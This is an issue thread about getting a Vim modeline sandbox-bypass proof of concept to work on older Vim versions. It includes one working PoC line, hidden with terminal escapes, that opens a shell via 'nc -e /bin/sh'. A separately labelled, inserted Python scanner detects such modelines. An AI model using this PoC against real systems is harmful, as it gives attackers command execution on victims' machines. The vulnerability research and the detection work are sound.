How to construct poc on vim74?
Larryxi opened this issue · comments
Hi,
I realize that function assert_fails is added in version 8, does that mean vim74 is not affected by this vulnerability, or how could I construct poc on vim74?
Thanks
Try replacing assert_fails() with execute(). The sandbox bypass is based on the :source! command. assert_fails() and execute() are just ways to run it.
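A defender-side check for the mechanism described in the reply above, as an added example that is not part of the original thread or of the project's code: it scans the lines Vim inspects for modelines (the first and last 5 by default) and flags any that carry source! or a call to assert_fails() or execute(). The function names, regexes and sample lines are constructed for illustration, and the match is a heuristic.

```python
import re

# Modeline introducers Vim accepts: "vi:", "vim:", "Vim:", "vim<N>:", "ex:",
# at the start of the line or preceded by whitespace.
MODELINE = re.compile(r"(?:^|\s)(?:vi|[Vv]im(?:[<>=]?\d+)?|ex):\s*(.*)")
# ":source!" and its abbreviations down to ":so!"
SOURCE_BANG = re.compile(r"\bso(?:u(?:r(?:ce?)?)?)?!")
# The two functions the thread names as ways to run :source! from an option.
RUNNERS = re.compile(r"\b(assert_fails|execute)\s*\(")


def candidate_lines(text, window=5):
    """Return (line_number, line) for the first and last `window` lines,
    mirroring Vim's default 'modelines' value of 5."""
    lines = text.splitlines()
    head = set(range(min(window, len(lines))))
    tail = set(range(max(0, len(lines) - window), len(lines)))
    return [(i + 1, lines[i]) for i in sorted(head | tail)]


def scan(text, window=5):
    """Return [(line_number, [reasons])] for suspicious modelines."""
    findings = []
    for lineno, line in candidate_lines(text, window):
        m = MODELINE.search(line)
        if not m:
            continue
        # Modeline values escape spaces, '!' and '%' with backslashes;
        # drop them so "source\!" is seen as "source!".
        options = m.group(1).replace("\\", "")
        reasons = []
        if SOURCE_BANG.search(options):
            reasons.append("source!")
        reasons.extend(sorted(set(RUNNERS.findall(options))))
        if reasons:
            findings.append((lineno, reasons))
    return findings


# Constructed samples: the modeline shape from this thread, without a payload.
BAD_EXECUTE = r"# vim: set fen fdm=expr fde=execute('set\ fde=x\ \ |\ source\!\ \%') fdl=0:"
BAD_ASSERT = r"# vim: set fdm=expr fde=assert_fails('source\!\ \%'):"
BENIGN = "# vim: set ts=4 sw=4 et:"

if __name__ == "__main__":
    for sample in (BAD_EXECUTE, BAD_ASSERT, BENIGN):
        print(scan("Nothing here.\n" + sample + "\n"))
```

A modeline outside the scanned window is not reported, because Vim would not parse it either under the default setting.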
Is it true?
^[[?7l^[SNothing here.^[:silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=execute('set\ fde=x\ \ |\ source\!\ \%') fdl=0: ^V^[[1G^V^[[KNothing here."^V^[[D
Ah, my bad. Actually, execute() also isn't implemented back in 7.4, so this won't work either. Off the top of my head, I can't give you an example of how to make the poc compatible with 7.4, but there likely is some way.
So how do I reproduce this bug in vim72?
I also could not produce this issue in version 7.4.1689. If anyone can reproduce this for this version then please let me know.
PS: I could make it work on NVIM v0.3.5-11-g1060bfd03.
let check it out